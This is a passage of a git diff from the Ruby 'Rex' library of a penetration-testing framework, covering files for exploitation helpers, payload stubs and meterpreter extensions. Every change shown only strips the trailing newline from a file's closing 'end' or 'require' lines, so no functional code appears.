a/lib/rex/exploitation/heaplib.rb +++ b/lib/rex/exploitation/heaplib.rb @@ -91,4 +91,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/javascriptosdetect.rb b/lib/rex/exploitation/javascriptosdetect.rb index 420454c6bd..a917258bf3 100644 --- a/lib/rex/exploitation/javascriptosdetect.rb +++ b/lib/rex/exploitation/javascriptosdetect.rb @@ -222,4 +222,4 @@ ENDJS end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/obfuscatejs.rb b/lib/rex/exploitation/obfuscatejs.rb index b23586d8b1..355b6c0188 100644 --- a/lib/rex/exploitation/obfuscatejs.rb +++ b/lib/rex/exploitation/obfuscatejs.rb @@ -239,4 +239,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/opcodedb.rb b/lib/rex/exploitation/opcodedb.rb index 8562e1eb00..d48ee060dd 100644 --- a/lib/rex/exploitation/opcodedb.rb +++ b/lib/rex/exploitation/opcodedb.rb @@ -813,4 +813,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/opcodedb.rb.ut.rb b/lib/rex/exploitation/opcodedb.rb.ut.rb index 29610fdae0..ced879a62b 100644 --- a/lib/rex/exploitation/opcodedb.rb.ut.rb +++ b/lib/rex/exploitation/opcodedb.rb.ut.rb @@ -276,4 +276,4 @@ protected } end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/seh.rb b/lib/rex/exploitation/seh.rb index 6a96e51bba..6dfbecfeb0 100644 --- a/lib/rex/exploitation/seh.rb +++ b/lib/rex/exploitation/seh.rb @@ -89,4 +89,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/exploitation/seh.rb.ut.rb b/lib/rex/exploitation/seh.rb.ut.rb index 54e6be0af2..2657bede26 100644 --- a/lib/rex/exploitation/seh.rb.ut.rb +++ b/lib/rex/exploitation/seh.rb.ut.rb @@ -16,4 +16,4 @@ class Rex::Exploitation::Seh::UnitTest < Test::Unit::TestCase assert_equal("\x41\x41\x41\x41", record[4, 4]) end -end +end \ No newline at end of file diff --git a/lib/rex/file.rb b/lib/rex/file.rb index f0850512c0..64c4ebddbe 100644 --- a/lib/rex/file.rb +++ b/lib/rex/file.rb @@ -73,4 +73,4 @@ module Find end -end +end \ No newline at end of file diff --git a/lib/rex/file.rb.ut.rb b/lib/rex/file.rb.ut.rb index e4e07fed4d..7fc6439bc7 100644 --- a/lib/rex/file.rb.ut.rb +++ b/lib/rex/file.rb.ut.rb @@ -13,4 +13,4 @@ class Rex::FileUtils::UnitTest < ::Test::Unit::TestCase assert_nil(Klass.find_full_path("cookie monster cake")) end -end +end \ No newline at end of file diff --git a/lib/rex/io/bidirectional_pipe.rb b/lib/rex/io/bidirectional_pipe.rb index cfbd3fcfe4..89ffdf2cc8 100644 --- a/lib/rex/io/bidirectional_pipe.rb +++ b/lib/rex/io/bidirectional_pipe.rb @@ -149,4 +149,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index 33531d837d..2f49eb6166 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -32,4 +32,4 @@ protected attr_writer :lsock, :rsock # :nodoc: end -end; end +end; end \ No newline at end of file diff --git a/lib/rex/io/stream.rb b/lib/rex/io/stream.rb index db73def3eb..33fd53864f 100644 --- a/lib/rex/io/stream.rb +++ b/lib/rex/io/stream.rb @@ -295,4 +295,4 @@ protected end -end end +end end \ No newline at end of file diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index 03c77b69e6..538e16ff22 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -118,4 +118,4 @@ protected attr_writer :lsock, :rsock # :nodoc: end -end; end +end; end \ No newline at end of file diff --git a/lib/rex/io/stream_server.rb b/lib/rex/io/stream_server.rb index cc83488885..75d6e61236 100644 --- a/lib/rex/io/stream_server.rb +++ b/lib/rex/io/stream_server.rb @@ -188,4 +188,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/job_container.rb b/lib/rex/job_container.rb index 8d0cc1de60..2d47be0241 100644 --- a/lib/rex/job_container.rb +++ b/lib/rex/job_container.rb @@ -167,4 +167,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/rex/logging.rb b/lib/rex/logging.rb index 51bb2b97da..f8743e55f8 100644 --- a/lib/rex/logging.rb +++ b/lib/rex/logging.rb @@ -1,4 +1,4 @@ #!/usr/bin/env ruby require 'rex/constants' # for LEV_'s -require 'rex/logging/log_dispatcher' +require 'rex/logging/log_dispatcher' \ No newline at end of file diff --git a/lib/rex/logging/log_dispatcher.rb b/lib/rex/logging/log_dispatcher.rb index 1b12f2c4ee..81e21a541a 100644 --- a/lib/rex/logging/log_dispatcher.rb +++ b/lib/rex/logging/log_dispatcher.rb @@ -176,5 +176,4 @@ def get_log_level(src) end # Creates the global log dispatcher -$dispatcher = Rex::Logging::LogDispatcher.new - +$dispatcher = Rex::Logging::LogDispatcher.new \ No newline at end of file diff --git a/lib/rex/logging/log_sink.rb b/lib/rex/logging/log_sink.rb index 57afaa56f5..6726c3c01b 100644 --- a/lib/rex/logging/log_sink.rb +++ b/lib/rex/logging/log_sink.rb @@ -39,4 +39,4 @@ end end require 'rex/logging/sinks/flatfile' -require 'rex/logging/sinks/stderr' +require 'rex/logging/sinks/stderr' \ No newline at end of file diff --git a/lib/rex/logging/sinks/flatfile.rb b/lib/rex/logging/sinks/flatfile.rb index dcd6eba984..bbe5248a95 100644 --- a/lib/rex/logging/sinks/flatfile.rb +++ b/lib/rex/logging/sinks/flatfile.rb @@ -52,4 +52,4 @@ protected end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/logging/sinks/stderr.rb b/lib/rex/logging/sinks/stderr.rb index 253938ad42..db9d9a8ca3 100644 --- a/lib/rex/logging/sinks/stderr.rb +++ b/lib/rex/logging/sinks/stderr.rb @@ -40,4 +40,4 @@ protected end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/machparsey.rb b/lib/rex/machparsey.rb index fc47aefc9a..1dfc77ce07 100644 --- a/lib/rex/machparsey.rb +++ b/lib/rex/machparsey.rb @@ -6,4 +6,4 @@ module MachParsey end end -require 'rex/machparsey/mach' +require 'rex/machparsey/mach' \ No newline at end of file diff --git a/lib/rex/machparsey/exceptions.rb b/lib/rex/machparsey/exceptions.rb index 2510314688..53353cbb4e 100644 --- a/lib/rex/machparsey/exceptions.rb +++ b/lib/rex/machparsey/exceptions.rb @@ -31,5 +31,4 @@ class FatHeaderError < FatParseError end end -end - +end \ No newline at end of file diff --git a/lib/rex/machparsey/mach.rb b/lib/rex/machparsey/mach.rb index f1aea189ae..b377e39118 100644 --- a/lib/rex/machparsey/mach.rb +++ b/lib/rex/machparsey/mach.rb @@ -206,4 +206,4 @@ end end -end +end \ No newline at end of file diff --git a/lib/rex/machparsey/machbase.rb b/lib/rex/machparsey/machbase.rb index d651cc2d74..f04e351ae7 100644 --- a/lib/rex/machparsey/machbase.rb +++ b/lib/rex/machparsey/machbase.rb @@ -405,4 +405,4 @@ class FatBase end end -end +end \ No newline at end of file diff --git a/lib/rex/machscan.rb b/lib/rex/machscan.rb index a6ce1b0cd7..c89ac30ad7 100644 --- a/lib/rex/machscan.rb +++ b/lib/rex/machscan.rb @@ -6,4 +6,4 @@ module MachScan end end -require 'rex/machscan/scanner' +require 'rex/machscan/scanner' \ No newline at end of file diff --git a/lib/rex/machscan/scanner.rb b/lib/rex/machscan/scanner.rb index e4072958b1..748d04ca09 100644 --- a/lib/rex/machscan/scanner.rb +++ b/lib/rex/machscan/scanner.rb @@ -213,4 +213,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/mime.rb b/lib/rex/mime.rb index 57498c2f54..76a9ac9815 100644 --- a/lib/rex/mime.rb +++ b/lib/rex/mime.rb @@ -6,4 +6,4 @@ require 'rex/mime/part' require 'rex/mime/message' end -end +end \ No newline at end of file diff --git a/lib/rex/mime/header.rb b/lib/rex/mime/header.rb index 4d4741fc7b..be8ce453e4 100644 --- a/lib/rex/mime/header.rb +++ b/lib/rex/mime/header.rb @@ -72,4 +72,4 @@ class Header end end -end +end \ No newline at end of file diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb index 328a61a96d..8ac21af022 100644 --- a/lib/rex/mime/message.rb +++ b/lib/rex/mime/message.rb @@ -109,4 +109,4 @@ class Message end end -end +end \ No newline at end of file diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index ed00fb82c0..123f8f365f 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -17,4 +17,4 @@ class Part end end -end +end \ No newline at end of file diff --git a/lib/rex/nop/opty2.rb b/lib/rex/nop/opty2.rb index 187e558b60..b3fb6ab5e4 100644 --- a/lib/rex/nop/opty2.rb +++ b/lib/rex/nop/opty2.rb @@ -105,4 +105,4 @@ class Opty2 end end -end +end \ No newline at end of file diff --git a/lib/rex/nop/opty2.rb.ut.rb b/lib/rex/nop/opty2.rb.ut.rb index b670e59b55..d550955bf5 100644 --- a/lib/rex/nop/opty2.rb.ut.rb +++ b/lib/rex/nop/opty2.rb.ut.rb @@ -20,4 +20,4 @@ class Rex::Nop::Opty2::UnitTest < Test::Unit::TestCase } end -end +end \ No newline at end of file diff --git a/lib/rex/nop/opty2_tables.rb b/lib/rex/nop/opty2_tables.rb index c6b7173979..4dff0730d8 100644 --- a/lib/rex/nop/opty2_tables.rb +++ b/lib/rex/nop/opty2_tables.rb @@ -280,4 +280,4 @@ module Opty2Tables end end -end +end \ No newline at end of file diff --git a/lib/rex/parser/arguments.rb b/lib/rex/parser/arguments.rb index 9c3ff92412..48b5aa9b57 100644 --- a/lib/rex/parser/arguments.rb +++ b/lib/rex/parser/arguments.rb @@ -91,4 +91,4 @@ class Arguments end end -end +end \ No newline at end of file diff --git a/lib/rex/parser/arguments.rb.ut.rb b/lib/rex/parser/arguments.rb.ut.rb index 81f0ce8953..a520fdd0b4 100644 --- a/lib/rex/parser/arguments.rb.ut.rb +++ b/lib/rex/parser/arguments.rb.ut.rb @@ -64,4 +64,4 @@ class Rex::Parser::Arguments::UnitTest < Test::Unit::TestCase assert_equal(args[9], "yup") end -end +end \ No newline at end of file diff --git a/lib/rex/parser/ini.rb b/lib/rex/parser/ini.rb index ccd90aebf3..0cf701462e 100644 --- a/lib/rex/parser/ini.rb +++ b/lib/rex/parser/ini.rb @@ -182,4 +182,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/parser/ini.rb.ut.rb b/lib/rex/parser/ini.rb.ut.rb index 1890c1f34e..e2181299ee 100644 --- a/lib/rex/parser/ini.rb.ut.rb +++ b/lib/rex/parser/ini.rb.ut.rb @@ -26,4 +26,4 @@ END assert_equal(TestIni + "\n", ini.to_s) end -end +end \ No newline at end of file diff --git a/lib/rex/payloads.rb b/lib/rex/payloads.rb index 1b9315643a..812e37951c 100644 --- a/lib/rex/payloads.rb +++ b/lib/rex/payloads.rb @@ -1 +1 @@ -require 'rex/payloads/win32' +require 'rex/payloads/win32' \ No newline at end of file diff --git a/lib/rex/payloads/win32.rb b/lib/rex/payloads/win32.rb index 563607516f..1ad36583b2 100644 --- a/lib/rex/payloads/win32.rb +++ b/lib/rex/payloads/win32.rb @@ -1,2 +1,2 @@ require 'rex/payloads/win32/common' -require 'rex/payloads/win32/kernel' +require 'rex/payloads/win32/kernel' \ No newline at end of file diff --git a/lib/rex/payloads/win32/common.rb b/lib/rex/payloads/win32/common.rb index a46926bf5c..417517171e 100644 --- a/lib/rex/payloads/win32/common.rb +++ b/lib/rex/payloads/win32/common.rb @@ -23,4 +23,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/payloads/win32/kernel.rb b/lib/rex/payloads/win32/kernel.rb index 1bd9b9da07..92f961cc37 100644 --- a/lib/rex/payloads/win32/kernel.rb +++ b/lib/rex/payloads/win32/kernel.rb @@ -50,4 +50,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/payloads/win32/kernel/common.rb b/lib/rex/payloads/win32/kernel/common.rb index 23378de69c..fc629c9455 100644 --- a/lib/rex/payloads/win32/kernel/common.rb +++ b/lib/rex/payloads/win32/kernel/common.rb @@ -51,4 +51,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/payloads/win32/kernel/migration.rb b/lib/rex/payloads/win32/kernel/migration.rb index 4e3ee264b8..3f8d829473 100644 --- a/lib/rex/payloads/win32/kernel/migration.rb +++ b/lib/rex/payloads/win32/kernel/migration.rb @@ -9,4 +9,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/payloads/win32/kernel/recovery.rb b/lib/rex/payloads/win32/kernel/recovery.rb index e57dce5fbf..001423c4d7 100644 --- a/lib/rex/payloads/win32/kernel/recovery.rb +++ b/lib/rex/payloads/win32/kernel/recovery.rb @@ -47,4 +47,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/payloads/win32/kernel/stager.rb b/lib/rex/payloads/win32/kernel/stager.rb index 8ee1a7eae9..272fcce539 100644 --- a/lib/rex/payloads/win32/kernel/stager.rb +++ b/lib/rex/payloads/win32/kernel/stager.rb @@ -105,4 +105,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb index 0098fd8ac3..1f318dba95 100644 --- a/lib/rex/peparsey/exceptions.rb +++ b/lib/rex/peparsey/exceptions.rb @@ -26,4 +26,4 @@ end class WtfError < PeError end -end end +end end \ No newline at end of file diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb index 11554b55a7..06c5268957 100644 --- a/lib/rex/peparsey/pe.rb +++ b/lib/rex/peparsey/pe.rb @@ -178,5 +178,4 @@ class Pe < PeBase (ptr_32?) ? ("0x%.8x" % va) : ("0x%.16x" % va) end -end end end - +end end end \ No newline at end of file diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index 351387f9ff..b6cf2ea618 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -48,5 +48,4 @@ class PeMemDump < PeBase end -end end end - +end end end \ No newline at end of file diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index 8d793e8b10..b586a34df2 100644 --- a/lib/rex/peparsey/pebase.rb +++ b/lib/rex/peparsey/pebase.rb @@ -1516,5 +1516,4 @@ class PeBase rname.to_s end -end end end - +end end end \ No newline at end of file diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index c9d4dc83df..fe874a05f7 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -115,4 +115,4 @@ class Section end -end end +end end \ No newline at end of file diff --git a/lib/rex/pescan/analyze.rb b/lib/rex/pescan/analyze.rb index b921e2a1f1..6ceb7b54c9 100644 --- a/lib/rex/pescan/analyze.rb +++ b/lib/rex/pescan/analyze.rb @@ -296,4 +296,4 @@ module Analyze end end -end +end \ No newline at end of file diff --git a/lib/rex/pescan/scanner.rb b/lib/rex/pescan/scanner.rb index 5d541ae965..2fabe845cc 100644 --- a/lib/rex/pescan/scanner.rb +++ b/lib/rex/pescan/scanner.rb @@ -193,4 +193,4 @@ module Scanner end end -end +end \ No newline at end of file diff --git a/lib/rex/pescan/search.rb b/lib/rex/pescan/search.rb index e4a1d95d79..26235a4c8e 100644 --- a/lib/rex/pescan/search.rb +++ b/lib/rex/pescan/search.rb @@ -45,4 +45,4 @@ module Search end end end -end +end \ No newline at end of file diff --git a/lib/rex/platforms.rb b/lib/rex/platforms.rb index de1c712ef7..1da07e02cd 100644 --- a/lib/rex/platforms.rb +++ b/lib/rex/platforms.rb @@ -1 +1 @@ -require 'rex/platforms/windows' +require 'rex/platforms/windows' \ No newline at end of file diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb index 72a793e865..7b2223a47c 100644 --- a/lib/rex/platforms/windows.rb +++ b/lib/rex/platforms/windows.rb @@ -48,4 +48,4 @@ module Windows end end -end +end \ No newline at end of file diff --git a/lib/rex/poly.rb b/lib/rex/poly.rb index 017eef068d..5ccf3c133a 100644 --- a/lib/rex/poly.rb +++ b/lib/rex/poly.rb @@ -128,4 +128,4 @@ class State end end -end +end \ No newline at end of file diff --git a/lib/rex/poly/block.rb b/lib/rex/poly/block.rb index f6b8a61783..b4d5c40646 100644 --- a/lib/rex/poly/block.rb +++ b/lib/rex/poly/block.rb @@ -465,4 +465,4 @@ module SymbolicBlock end end -end +end \ No newline at end of file diff --git a/lib/rex/poly/register.rb b/lib/rex/poly/register.rb index 08ed820d55..e24b6f9cba 100644 --- a/lib/rex/poly/register.rb +++ b/lib/rex/poly/register.rb @@ -97,4 +97,4 @@ class InvalidRegisterError < RuntimeError end end -end +end \ No newline at end of file diff --git a/lib/rex/poly/register/x86.rb b/lib/rex/poly/register/x86.rb index 7137cd03ad..a37f4dd198 100644 --- a/lib/rex/poly/register/x86.rb +++ b/lib/rex/poly/register/x86.rb @@ -37,4 +37,4 @@ class LogicalRegister::X86 < LogicalRegister end end -end +end \ No newline at end of file diff --git a/lib/rex/post.rb b/lib/rex/post.rb index 34d48cb525..b9fb5579de 100644 --- a/lib/rex/post.rb +++ b/lib/rex/post.rb @@ -5,4 +5,4 @@ require 'rex/post/permission' # Post-exploitation clients require 'rex/post/dispatch_ninja' -require 'rex/post/meterpreter' +require 'rex/post/meterpreter' \ No newline at end of file diff --git a/lib/rex/post/dir.rb b/lib/rex/post/dir.rb index eef5274ec8..653ba7bff8 100644 --- a/lib/rex/post/dir.rb +++ b/lib/rex/post/dir.rb @@ -48,5 +48,4 @@ class Dir end end -end; end # Post/Rex - +end; end # Post/Rex \ No newline at end of file diff --git a/lib/rex/post/file.rb b/lib/rex/post/file.rb index 1e7e884b23..18ece55255 100644 --- a/lib/rex/post/file.rb +++ b/lib/rex/post/file.rb @@ -168,4 +168,4 @@ module File end -end; end # Post/Rex +end; end # Post/Rex \ No newline at end of file diff --git a/lib/rex/post/file_stat.rb b/lib/rex/post/file_stat.rb index 31b73305ad..57c7154cb8 100644 --- a/lib/rex/post/file_stat.rb +++ b/lib/rex/post/file_stat.rb @@ -203,4 +203,4 @@ class FileStat end end -end; end # Post/Rex +end; end # Post/Rex \ No newline at end of file diff --git a/lib/rex/post/io.rb b/lib/rex/post/io.rb index 2f48511c4a..d4953fb3b5 100644 --- a/lib/rex/post/io.rb +++ b/lib/rex/post/io.rb @@ -179,5 +179,4 @@ class IO end -end; end # Post/Rex - +end; end # Post/Rex \ No newline at end of file diff --git a/lib/rex/post/meterpreter.rb b/lib/rex/post/meterpreter.rb index 8c5da48ad8..9d6df801f9 100644 --- a/lib/rex/post/meterpreter.rb +++ b/lib/rex/post/meterpreter.rb @@ -1,4 +1,4 @@ #!/usr/bin/env ruby require 'rex/post/meterpreter/client' -require 'rex/post/meterpreter/ui/console' +require 'rex/post/meterpreter/ui/console' \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index d463fcefca..881bdc0c59 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -419,4 +419,4 @@ protected end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channel_container.rb b/lib/rex/post/meterpreter/channel_container.rb index 9e78890f55..9a254b2ddb 100644 --- a/lib/rex/post/meterpreter/channel_container.rb +++ b/lib/rex/post/meterpreter/channel_container.rb @@ -51,4 +51,4 @@ protected end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channels/pool.rb b/lib/rex/post/meterpreter/channels/pool.rb index 14319fb0b8..414f1034d7 100644 --- a/lib/rex/post/meterpreter/channels/pool.rb +++ b/lib/rex/post/meterpreter/channels/pool.rb @@ -156,4 +156,4 @@ protected end -end; end; end; end +end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channels/pools/file.rb b/lib/rex/post/meterpreter/channels/pools/file.rb index bdba8ac320..fa0b14c326 100644 --- a/lib/rex/post/meterpreter/channels/pools/file.rb +++ b/lib/rex/post/meterpreter/channels/pools/file.rb @@ -58,4 +58,4 @@ class File < Rex::Post::Meterpreter::Channels::Pool end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb index 39b1e13127..b0f376e886 100644 --- a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +++ b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb @@ -95,4 +95,4 @@ class StreamPool < Rex::Post::Meterpreter::Channels::Pool end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb index 0e01ba4a09..2d4120fd2b 100644 --- a/lib/rex/post/meterpreter/channels/stream.rb +++ b/lib/rex/post/meterpreter/channels/stream.rb @@ -76,4 +76,4 @@ class Stream < Rex::Post::Meterpreter::Channel end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index 3d9ef85771..9181da89f6 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -236,4 +236,4 @@ protected attr_writer :ext, :sock # :nodoc: end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 199f27e5f9..7443d5aaeb 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -351,4 +351,4 @@ class ClientCore < Extension end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/dependencies.rb b/lib/rex/post/meterpreter/dependencies.rb index 47852c5936..fcd258cc9d 100644 --- a/lib/rex/post/meterpreter/dependencies.rb +++ b/lib/rex/post/meterpreter/dependencies.rb @@ -1,3 +1,3 @@ #!/usr/bin/env ruby -require 'rex/post/permission' +require 'rex/post/permission' \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb index 545f6abfb6..ab486e8b0d 100644 --- a/lib/rex/post/meterpreter/extension.rb +++ b/lib/rex/post/meterpreter/extension.rb @@ -29,4 +29,4 @@ protected attr_accessor :client # :nodoc: end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb index 58827d3a5f..c33d315730 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb @@ -91,4 +91,4 @@ class Incognito < Extension end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb index ce5ecc8861..686c5ca3ed 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb @@ -18,4 +18,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/priv/fs.rb b/lib/rex/post/meterpreter/extensions/priv/fs.rb index 93302ec8ea..9470a04d82 100644 --- a/lib/rex/post/meterpreter/extensions/priv/fs.rb +++ b/lib/rex/post/meterpreter/extensions/priv/fs.rb @@ -115,4 +115,4 @@ protected end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/priv/passwd.rb b/lib/rex/post/meterpreter/extensions/priv/passwd.rb index 927b5ffa30..b8e92f9d4e 100644 --- a/lib/rex/post/meterpreter/extensions/priv/passwd.rb +++ b/lib/rex/post/meterpreter/extensions/priv/passwd.rb @@ -58,4 +58,4 @@ protected end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb index cc36efcfcd..e5e856aabd 100644 --- a/lib/rex/post/meterpreter/extensions/priv/priv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb @@ -60,4 +60,4 @@ protected end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb index 85ee22f2c0..aa6fcae1f1 100644 --- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb @@ -19,4 +19,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb index f32b79d70b..b4b5df934d 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb @@ -175,4 +175,4 @@ EWX_SHUTDOWN = 0x00000001 EWX_REBOOT = 0x00000002 EWX_FORCE = 0x00000004 EWX_POWEROFF = 0x00000008 -EWX_FORCEIFHUNG = 0x00000010 +EWX_FORCEIFHUNG = 0x00000010 \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb index f613713097..92941b201f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb @@ -270,4 +270,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index bb6277a964..5da3638f57 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -210,4 +210,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb index e07b46c0d0..9967b83e5a 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb @@ -100,4 +100,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb index da195893e9..d21221b696 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb @@ -45,4 +45,4 @@ class IO < Rex::Post::IO end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index f6cd06463f..36202bdb53 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -141,4 +141,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb index f692040c4d..b5ed1d77b4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb @@ -67,4 +67,4 @@ class Interface end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb index de4295f6a2..617d89d674 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb @@ -53,4 +53,4 @@ class Route end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index a0b3aa995a..49125bb165 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -226,4 +226,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index 7a88a32c88..5455c5d284 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -107,4 +107,4 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb index 347aa3c94e..d39ddbe8c6 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +++ 